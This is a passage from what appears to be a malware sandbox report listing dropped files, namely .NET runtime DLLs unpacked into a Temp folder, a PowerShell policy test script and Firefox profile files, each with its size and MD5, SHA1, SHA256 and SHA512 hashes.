41c687bc4df29a5bda098d4db8443665df536ddd

SHA256
2d186859594d7f5f7be1587e03dd71e047f8f25253a1204c2585a76843b77cca

SHA512
225dec3e35a1eac9ca7ec52e1d79b8e0ddf2d0e112102fcd76bdef0df9e613e6de1aae16a2dce3a49e82b2b5dbd29e19421a3b6b0e7e8b0aebeb1318b592957a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\PresentationFramework.dll

Filesize
15.5MB

MD5
d4b260a0eaa3a81497caf581d043877a

SHA1
ddac1aa40db19e70c7af31bd9cc241a2b236fbb2

SHA256
f708d0126ce5a9108e806a361c44709aff99c901e5491cc3fdc7c0a5761c2a5a

SHA512
f72bb0f6ae6098ceb17c992fd06673ef726badfb5940e038670bbf384ee822f1eef1bbe7a2b7e6334863c50d2c812fec8619d709828546bf815f9dac29be4582

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\PresentationNative_cor3.dll

Filesize
1.2MB

MD5
e67dff697095b778ab6b76229c005811

SHA1
88a54a3e3ff2bf83a76bbf5df8a0e50bdb36bcdc

SHA256
e92b997f6f3a10b43d3fdc7743307228aa3b0a43430af60ccb06efa154d37e6a

SHA512
6f2a2bbbfa0464537fccb53d40239a294dca8fd477e79d70cd9f74079da48525a300675d3b0daae292432adbb9dd099fd4dc95b6fe2794f4c5f3a7e56e15ef51

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Collections.Concurrent.dll

Filesize
258KB

MD5
2e48ca7a4217cd449a2d936ac90a9cba

SHA1
af0cb6959863bf56ddc5700dba643d4f122621ee

SHA256
481ea24d7cc9caf499f79ae6d4de9453f01077f370c90fab1b5f6bd13c2b6a75

SHA512
2f75b18aba3e04ab916f5f33f007998837bccf9d29f8fb214764706edc770b7613ea5c36ba853e73d2c3e36124466ea4d1a5374fcf17a8975031436d2f114681

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Collections.NonGeneric.dll

Filesize
106KB

MD5
bc0819bd1f85afc33531e568d17af8a0

SHA1
d8756515f71ba3c776ded3a7fb45055990dcfe5c

SHA256
0c6aa659cb235c6923777b2d2a8f860c191b19a101fb4df217c5a44d6979f939

SHA512
9e75dd43f1452e6e0db6002584c7d803e9837c568f334617bda5617f2729cd4944ab6e1b824230c83ce5450d2f24824bb2bda64c4deeb41553b6b4650d74d059

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Collections.Specialized.dll

Filesize
106KB

MD5
04d948cb49a01daec0577d8459172bef

SHA1
3a83edf6f6a890de0729fee8f1fbceed4aec5893

SHA256
751d792af9a2c6046dbed9c4b821f1b68abe3a1ee66d4eb88551f45756ea3b78

SHA512
94df08e96cdcbd5b9856439184a200da6a99111becaec805121c8c1ec9b2e02b9e69a8b8774ed1032dc47d7646a48bec235cbb2ebc73a17461921117d08cb207

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Collections.dll

Filesize
262KB

MD5
7f93948dc4d4883ad21147ab93186571

SHA1
871953f575a0860918fceafa3258bf0a7ac5f53e

SHA256
e029ecd6bc46e34d1099a10115c94587a62a5f5431f4e99ffc623b37c2f9afcb

SHA512
158c736044474fcc532ebbc7ef573a7baf07ee70c117508cfc25709671f4f04850388b2d5372a2a3728843c0c15738c3241faa1e5a947e6142b8f69585061799

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.ComponentModel.EventBasedAsync.dll

Filesize
46KB

MD5
13afd2c8ad423bf4dc9d2038f78d0c93

SHA1
9d9b0d2fd7a22bd03afc427b9f8dc3651e864b48

SHA256
168ef8a599b37f4b3ffe40a231c93de7d935689fbec985f058e99af71b4260c1

SHA512
803c455e29bbf0bb23bb55c4a6f9c80de23b1a61adcb182d1d481a781a732caee4cc56cbc4dce0e1d28ee1d1e9930ddf3054723a397e3bfa811fba0618dc8a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.ComponentModel.Primitives.dll

Filesize
82KB

MD5
401eeedc1a5cd6c9222bb365a0ea03cc

SHA1
d645406854f60be3c8095a6a6258a31f5ed6cb45

SHA256
01f04ad89194c81a97a5351b5d925c315d06c6d23ac155dcea4b44fe432b8c40

SHA512
c5dd198f6b0b1390bfbf823a4ee903c218fc3c477f02dabc8c32681ced1fc38ad30b7993643ed4ee126c6c95021c9ffadfaea0e0362eeb25ad8a89598716d91c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.ComponentModel.TypeConverter.dll

Filesize
738KB

MD5
e75e07183de713fac418e7d47a6c3574

SHA1
f9ae919d8150d15ffc90f50f5c489304d9163d89

SHA256
6bc3547951a715589ec145f3f1ffe3d2128ef4b50a2c782fcfda02ed05b01596

SHA512
c785f8de3364d148a7340e0b996b6e77e48f710b6b3765eefd93090726ddc3dbd002ca3c112173901716cd64049de74a32d1fd396c68b33bd9b238b6fba50df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.ComponentModel.dll

Filesize
30KB

MD5
608b34843b8b7426d1fe3a4ac3719190

SHA1
8f623a78412350a645fa379a0656bc36acfbe017

SHA256
0c267a782bc30fa269781780438aa84899af6b4a625027ce613d23268d016385

SHA512
2ae9059e0480f1805e64918a238daba5880c7604161eac3c483d5a3af3316265152692e4add7cca775c667ce4a93d2ef285de054624edb81d3b814fca7e3d9e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Configuration.ConfigurationManager.dll

Filesize
1.0MB

MD5
dd656aaa7844121cc88ca89217c646dc

SHA1
9c72c640b5753d917f2682fd3cf33aad3002a0ea

SHA256
6d1334a46225b13b9b2f5e788fd82fb41edd99eaa392de8b28eaeb518bd65f8b

SHA512
a69c4c985a19d04f9fec954c7262a6020bc3e3ddf95f7871f70b630f4ed440778b880609497c44e9a3d6d6be3a57ef40e57f227de3db256992d9fd2cbee4c916

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Diagnostics.DiagnosticSource.dll

Filesize
394KB

MD5
9afcbc0a7742e1e8892a31cb9c15ae91

SHA1
c4e0b1f18868c8bb6b5f60a85544f29e729f0c95

SHA256
fcd720774ba1a8bad281377f9515263cb143ad555fc8b0aa00b634af1d875b9c

SHA512
6750a00abd3e2663563410493674d1812d3fbf7a9a210e439e2365bfa7838fa30ff5ed3b25ae4ec3243621da8ff88e1e1a8357943b093d4d0a54bb0cce846880

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Diagnostics.Process.dll

Filesize
338KB

MD5
e3bb7d4d834ca3e44b971fe7d1180071

SHA1
bf60468a4f1bdba719913307aa2492a337ec8301

SHA256
30c92bcb55ec2a9cad7dcab8a46441c5f14b37b02bec76b71c9f67fe51b2f7a3

SHA512
9d187e552a921fbfcfa9db7c49678258c61a0c40bb6ab12ac61ecf4ec96950fc966d95a0eede30c3aba57b84ecbf93d5acdf6bc922d869871efabed4964d4647

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Diagnostics.TraceSource.dll

Filesize
146KB

MD5
5e3f0257df80ec5a311d00b560c089e9

SHA1
5110c9ea20d8907ac729301c5858c6c1007302ad

SHA256
54b81d872408ada6764d770f64acbb38318327dea4cbe71deed2a2e387d73b44

SHA512
ddaa512bcd4aaac7fc47775297cd98eef4342c3557af39d7745a660c339685c09fc78add7b7ec47d7a117328f82effa06b9045cb703ba734b0c31ad5ff43ee84

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.IO.Packaging.dll

Filesize
278KB

MD5
f3ba798c01b05830322932c109779df6

SHA1
80a4e02e67786db31fdcaa24b08381cb82e9fa1c

SHA256
c764030fe52512f04161bf12418ad1bb883bfeaa072a474ba15304a52b3fb143

SHA512
8bece2164802d7175b5bfe187804443f44d91cd10c1dcf86dc2300ec39be4b8e6764644f023076b31a086ea6217ddce7ec6ee6fef73a4bd9f25d6ac3599ce7f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Linq.dll

Filesize
494KB

MD5
e15d9f4fe1c46770eebaa6deee7fc1a3

SHA1
1c40fb2517f74fca1896f22fbad5c573361819ab

SHA256
d0521b1a0685855e9dc4c119a6f659eec5db08e2091cc8a4368572c05b7c82dd

SHA512
a9044016cf7af3b113ead03b1d4b1b3c2bf17df5fd835cda692a6d78088269d864605e9be6d4e5abc6d8898f1fe63a999a6f3a969e547bf0f30be74525c56b1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Memory.dll

Filesize
158KB

MD5
9efad7640f68fb8d3e9d12680bfc883d

SHA1
a5d60b333a75ea3faf9d0a9fbf1ad15a505d20c1

SHA256
4e1f49e42ec0ca7a55f017e1300db72ce49d5bc35da8c30b0ebbc18adf19ae2c

SHA512
d3b2b59b6e995c4580f9abdbf468b8adafd9a05436aeb5f62808c842da3dc0b6b1c57a1171d91d653c69b63f048c939d13cdffd272f85a5197f7eb01288de545

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Http.dll

Filesize
1.7MB

MD5
c15232f41b2ad231273702308d2c3ec4

SHA1
cf07344f36f10b59614001e0871054bcffd06649

SHA256
37369a8e2868bfd0838a3f95cedb64e0ab2e6b0c88e12f2eb3c5c2a9412dd2d3

SHA512
40b6665c55e470c039a0f2ba66028499e0cf48cc8c88e7e40c5476c678475af2609df8cd872139463b6a5d4225840fcd1e4782f055de3b9fb045475e155007ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.NameResolution.dll

Filesize
114KB

MD5
490982c98a2ce92b7d740ab459a45096

SHA1
c3555a68f8d36ea0753f6b41d4e07aff73c8b46c

SHA256
86bec69beed78e7d6c584c8abe35d043e14df792fdf753fc1e72b68c294b4ce4

SHA512
b4f3860eb4d9ba4fb323da530c0f2d02686d66e1a03868c7310cafbd93586b10176d3e0f0285b81e0f62acdd52efee1b1f062af7d86c602c06a6db35745ae774

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Primitives.dll

Filesize
222KB

MD5
adcbed0635fd16d1c8195f1215cc18fc

SHA1
ea0d919d4089d623fb53681297a9a2be1f2dde90

SHA256
d5c032d5837d31cc9953603b4e79d696e7b31a8ad3c7de031e61371eed88b50b

SHA512
5a81d0918c4f529fafeaabbe8a15de65038f44d5430ab6cccdb11f4eb33b4091c7da5386de88dde68ba67b80b61700fd9091b5dd386b26145fdbbef80457bacd

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Quic.dll

Filesize
262KB

MD5
03b1a3faeaba732c7052b97e23ebc89b

SHA1
2fe7da6d50fe3d846db1ed101ae7a70a0603fffe

SHA256
efc7ad2a4a4aeea513f52896515bbf16ea264e2f6d3dd1c627bf3ffa58688059

SHA512
f006f02bb349a4f9dec42bf4d0b9a13cdf3a290c87a630950653dabde8be911899d78458b9c4eddbb19456bc1768f9ab572ce3e87f3e0ddfa397718702a85579

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Requests.dll

Filesize
350KB

MD5
a40a51badc9d36955e002bd1e80ce894

SHA1
4edecd6b18158301038edd1890e6d6a290d3234c

SHA256
f6c007ede0d2ae1e815943091208d7a535cf9804bea65a0aebfabdd1dc2544a4

SHA512
83597e44b50b92f9a739f7cc053e7480bb72996ecea1de62ac08d3a99fc8dd4be24f6e38931b49f270b56d29445c33388c37b0133846851432dc9b49e422376e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Security.dll

Filesize
610KB

MD5
b778b48a5104733f4e8cd2d2b6849b65

SHA1
87928d3db411a008340d0e94bd9204f554ca733f

SHA256
ad77b159fa9daec4da1b275ddd279db392b388f3efa8000dbe6c04c96c1b8468

SHA512
58e529f7e684bd9ef737e9d775b7baf49985893153c0cfc13905fb7570e7f037f0c243e9e1c767a630633b18d6498fd73a249ee76168c1d9914511fcad7dcc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.ServicePoint.dll

Filesize
46KB

MD5
62f1e3643e466ec08131df0a8df54aa6

SHA1
238fab3e496c81f9b80d57caebdef14f8cb30fb3

SHA256
d25e8f923630e9f02a4238ed4d51c899c3c76db2a15dde743bbba8ed2a2ffaa1

SHA512
1f33e19105086b0609ce60f845f92c76287ac98b6fdf6d935f0cb98662ea2eebbfcd1aca76781989fbebc3b9417f57968a56eb0789f16f9a128313a4ddd9a265

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.Sockets.dll

Filesize
550KB

MD5
12e0e9fce32f1c6901f0623f8d882d09

SHA1
03bc938613028001649e25b00ab34dd84a9f32b1

SHA256
91f2d6a01e0d7f9418ff2f337bb03ed3c457edd4da72164359f2f0ffd1b9573b

SHA512
bf3a263ff2910788b8028048868fea0d0ae0c8065cfe931c36f019b32ceb05c814ea2cbd7f1d3869c7ca8152928bf6db1fd49361605701a21704adf7596aa2bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.WebClient.dll

Filesize
170KB

MD5
a11d33a2a5a5e66e3edb5f62c822c8cc

SHA1
288131e80668362105b84ece9ba189cfeed1c4da

SHA256
cc030b4cf024c7d503c30da7de9f84d147eed184a7a5fda37d52ec8b4c5176f8

SHA512
e6269feb0615b653a0c27b089d199d536c80d0e70b6721e2ba76944ff33c651a765c7ef651642aa416ffde809033de3c36e28d6666a2f063fe40160e9e366a2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Net.WebHeaderCollection.dll

Filesize
66KB

MD5
c0894a83eaefbd3b837058f5e038c444

SHA1
f238b6d8d62c94769ed46d7b1e5bda0c05b4a9bf

SHA256
d68dca599f7a122e4e45b556b242cd85a28257c701f62e041e0d2e86e5dd3c33

SHA512
e32bc427a19e92fee083d07aaecea06a5a89f96c89a89235d4e7bbb575655bbf4175106082ecf2814cb72716dfd7e4f57fd044082e66a97978fb050057880588

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.ObjectModel.dll

Filesize
82KB

MD5
50dcd9c27d5ee53cfdaec6ddf7144502

SHA1
58e146ccbdf15d472428463b790523afde9414f5

SHA256
1341e79c5e9971b52235648160c63837eafa59c743b0df4fdc370c9a1841c4dc

SHA512
fb7c4fec6fb16d7e2767414dc254988b7693e5db9a76b97fdb710f7b8d3788da45c7962ccb2a06fdd2807569d6f5f49a82f0568603f6f258d9392c1bfe078cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Private.CoreLib.dll

Filesize
11.1MB

MD5
1d0b5b063750903245a29d8d7a7c123e

SHA1
6e9df62f79be581a4b818149deb35d88424b29ed

SHA256
1387c7feaaca387376d320c324097e83b3c6afa263b3e9bb112aae803abf925f

SHA512
a21dff6e548d18941c7d207be51bbf3440d735e9a6a98e2caba2fdf1cf622ee5a0bd34f9f1dd654906cc1e3f868804f48450ba8deca06108534489875c5aed07

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Private.Uri.dll

Filesize
258KB

MD5
5cafe651ab785cf22fa7409a583f32e2

SHA1
2a346bc567d8e8cad6caee72500a47a4dea3c41d

SHA256
3efbdc54e88c94bd3023a811d55dc44c6919573d38986afb4c17dbf22e019974

SHA512
5968ce68da381adece545c70a12690b8c7bedaa27804dc4a03e49272589f6fb46bb7a45585961e2aca183239aa10d94cc510e2729a623b576167e1f394b4462a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Private.Xml.dll

Filesize
8.0MB

MD5
39591a0f2d3a6224e246a95fb2a8e3f5

SHA1
bd19645c5405cfbf2f4cfbff568e7b06e2d1e51b

SHA256
df641d132420e3d56fc2edad7b7563b7f18ccc5bcec24e7f2958691d48250d9c

SHA512
d8e7e34377cc7c52e489be0cc60119e0d27d08c724307d91010b729aa3b788dc9fdc228656e722369d46619f66fc8f58c152f8cf9ce881c4cb910a6e25d10cb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Runtime.CompilerServices.VisualC.dll

Filesize
34KB

MD5
917c110b54bb04d410d951e8bad13eb1

SHA1
0eff8354cbc7a66f8e8b07c4dbab12169a726e7c

SHA256
cae6331f3a0769a3e928646bb9205c46945a46d74856e78eda380771a5f9f79c

SHA512
ef326ef038d282fd18ac4e104af95d2030c20810902e12bed44abb2002e90cc9a7e5e1451a364fe78899f4f97e55d21e64b8f7f58be1a62f4a85898608231c0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Runtime.InteropServices.dll

Filesize
62KB

MD5
71c937014419622a45762973ce1880e9

SHA1
b05bcf456837afdc6c21092697e475f25de47970

SHA256
03a99ff7973a904d9ea3ba30fa2d935d53826cf3002f478dc6a1436c04890f79

SHA512
a204972c1c48021852b5d13a6cef1850e94a78d0ae9e56833c974f545f2161bda17c2c02d90e8ca7cd40ae0b79d96b329876c768cd77341c5e327c462887ef85

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Security.Claims.dll

Filesize
98KB

MD5
2369644ea90d550e765fd9eaaf359fce

SHA1
7bedc1dcb527023aeb55bb91a92106f06d6e7113

SHA256
dfbdc284c61278112e6638280aa8fa9ef7cfba952017d6eee9f57d64f4783e73

SHA512
261f4dfa5f1d52d55fa81a1b42cfe5fc616083d87b374ddd0ed184fddeb2af04d365181cd2d85426b5d7850a4326bf48d8c25055c0337316b82b4dfbdce29e76

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Security.Cryptography.dll

Filesize
1.9MB

MD5
1294bb8c9e56e7233b08631f010c9881

SHA1
09aa5800b7ff17b57fda8a370f7de80c73adaa61

SHA256
4b52d78fb3bd9b7ef64bbaf8a08510074d1a8fc30d9c715e5d513a47fc8f8103

SHA512
152d424260ae804e7e217d29934070c308ba97463857fe6b926f002c6d2507346bee89e79235970e61db0378edad4713089f22039ac22cb9b290ac29ba0c9221

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Security.Principal.Windows.dll

Filesize
186KB

MD5
591356ff3ba7bfaff32483a69ed4ab94

SHA1
5072577ac9ed61e73aea1bbe767d158725ef32d1

SHA256
fed8c59518da4c0f3802241fb160d90f779ccd9367f81e7decf16c37484cc004

SHA512
6e8078cad83681d50b6f160dcee107145e691c483f55aab864c69d607226e289471162d541d67ef80fc3b9eb234759f78124eb8a23a51c0a8e699bb1d74b6ccb

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Threading.dll

Filesize
86KB

MD5
02852f1da5541227b8f42942f02115fd

SHA1
d2a6787d4b46d9934bd3bf8a8254c0ef722ff92a

SHA256
8371d18e4f2a962235268b2688dff1209051e7ee165c037af6269bf081145d3e

SHA512
bb2cf51571ef207833cb614596451a9a6dfff86765e7bc0fede9ef471c0acdb44d1c075da294bf125f516aec3fdaa85bb49c0e09ee383b70cce8081717d4967b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Windows.Extensions.dll

Filesize
110KB

MD5
9950efb6a9985675d0196d0076d62682

SHA1
8b1234bf0199efde2f9ada7199d8b00c6f47a84f

SHA256
5d048e765383d1cbfac7eb35424691e9f9409b2b0fa0d7d032aa5ad1e2a9bc4b

SHA512
191b3787eaef8ec6b8aba42f9f228dd9a46081df698bd968bc5f55fa799a36366166e810162aeb86d27db6cd5b548bcc508de2c3ce9c2ea284c135e8b25f6825

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\System.Xaml.dll

Filesize
1.4MB

MD5
51d160699f72599258b121e851f5ddce

SHA1
d34ce9ea5265cca243830d3049aaaaea589e63e3

SHA256
84a0a304b9652913ee6f66780d5a9a1580bd4faeb26559a50cc2e1b58babcb32

SHA512
750e4a998b4c18c099863292b66a5a0e676a9defc082b279d670f811d3417f92085ad2eb1ec90b22d43962c695d54de223826aa657567e698adc4901b5cd60fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\UIAutomationProvider.dll

Filesize
62KB

MD5
fcd9e2ebae052f5d60b043cd13c597f7

SHA1
cfcd2a2692147b0f91c5f137c81e94f7b5f441c7

SHA256
8690986a2aa44b1668cf8213a5813122feb19c04b7b4b10a0f7b4d4a21617fcd

SHA512
ce21e12470ed7bb77d1f16e037942521f4528b4cf3dd081b0b97023c5b2c6912d396e5b62b883ec1b50a8ac3884b05c5e88d07233f92b62e65585e2cb877cab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\UIAutomationTypes.dll

Filesize
302KB

MD5
02d2d572b437e6c62641d7d754cf3045

SHA1
d9e6a773b61d5bf56c90b69a8d2db88ec156f467

SHA256
35220473ee5a10f9a02966f3fce2bb269d90b8c94b7b8d1072dc87b27e9f6d08

SHA512
cdd84532566e9e8cb3a80b7fd25113bdf888c4d31f65c87631dd881cbd43b49733fc48aa09c75cdf23fa764313656fa2a59ac3fb7a63f2a6475fa66b9f0916d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\WindowsBase.dll

Filesize
2.2MB

MD5
525dfecb94e08ccabda0c14aeae56779

SHA1
3537f0b1137316281f1b543076698d89ac63e37d

SHA256
05bdc00c08307c1e3d903e16e8325d7938108a7d2f31d607ebe69769fcc7398e

SHA512
04ae0cb7fe6e7e758f5187af0c03d9d3d82283d4ea6f03e910185fb7b51c98189b0ef5ae5c741c3b77fb8accaaeb76ec2c9dd033fdf6e269e792a16fe04e1362

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\wpfgfx_cor3.dll

Filesize
1.9MB

MD5
24ea1814e6701927b9c714e0a4c3c185

SHA1
95c27a6b1f5927e3021cb6f9d5ef5998b2c4560a

SHA256
d2ebedc0004d5e336c6092e417c11c051767c7dcbcb80303f3484fd805e084ae

SHA512
d6c2f32818970d989c834babeac1ce845e832b853ce1c0b3f7ecbfd41331b7d519461bcc0ef07fd35382f263b9e26ac47bb22f0370071913900fc40e3e2656f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x5ocijnt.qpm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
9KB

MD5
e428635def6233e3596e052186ecab9e

SHA1
3b288787e104035a185228061601cc2251a1eccc

SHA256
36febd137a73736a620355970c8a616bbc162c1d276086ad2d578cf3b1ec40fa

SHA512
8e546b70f29cb0949117f30250f1715083ccca33a1d5ed15be83bafe2a748f7ae3b29d4b2bb5ebb9ad1c3122812e7280057dec6182f7231265c7306930878e6e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q786IPIABQE6XZF503CQ.temp

Filesize
9KB

MD5
d86c34e7419e3e45f3ef91c4c340fcbd

SHA1
5f87bd8b80a354dca52c5d06154ef5a5349cf2a9

SHA256
83c04447bc0650106091d96e607f2045b9ee37d614df69255a889f5f9d4dea67

SHA512
0eb21ac557244ce85ae02f1cef1f2b1914a439d929f55b3f00aab4a7db2fa59b2d2f0ddfa78e25d78a2a76f7456249ab3e08ea23446b8b55351fe5e2c6d6af2c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\AlternateServices.bin

Filesize
8KB

MD5
f1f8c184ea862fd52050d897f1732c9a

SHA1
2e353852e0f08bf16e13fb57236ce8cce943950f

SHA256
8e0eceed35a99f2e61af682f68daf75ffd20899295a03b6e1847170b034b9b07

SHA512
91c54846335f2862e5ad09357477f04b441068da6f4696c52937a00d68595d8397b98c774fb5eb4ba4351394597706a43f42f293753be25abd6476dbd8b19f39

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\AlternateServices.bin

Filesize
12KB

MD5
3267aefca50895feddb8862813ee713b

SHA1
0565bf0f04e2ccde13fc137b9fa6335c32506136

SHA256
76b568f3459faaeef3b5684407eabcfe8c0445bfac00f77243fa769652e98666

SHA512
b801bf5061581695aa377c48d49b9de180c4a99f0ecceea4630ce29c08a0874b090cc26c74e72026197cd36cf6991c7dde54a563270587012fcfce147c53d552

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
1832b4ecddaa4737863c3f2689691bf6

SHA1
3a9eb85b6cc65dcf29f08bdce73802b9e013a9f4

SHA256
9f9271e5b11283f8a5f78b394c245b114bdb727cd32e62cb740f8c5954044722

SHA512
b8e1642540e9a4458262fbade02a902ae1bf001a41f08840320c6c7ded6bc7bec377f3e5c04bbc4b0362bb5264ea7bdfab1a2a18bc9a09dc4070fe67bc72a5db

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\db\data.safe.tmp

Filesize
37KB

MD5
e85a878a98bf303c5715af2f8b205fc6

SHA1
aa01ddfbdb81145d856d04bbd1ac931566a73b17

SHA256
b9ebc64d0dc254f1e184df7c06efee89a9894e33528565137025c1aa7c8e8c69

SHA512
7e521efde81de6068612cc4553c9d8f60fb0d85ac834c9ffbd938967c0b2c6cf3ffc7c472ebf0fd6abcce938c1dace5d54ec814573c8e4d6c437333ebd08f3ff

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\db\data.safe.tmp

Filesize
16KB

MD5
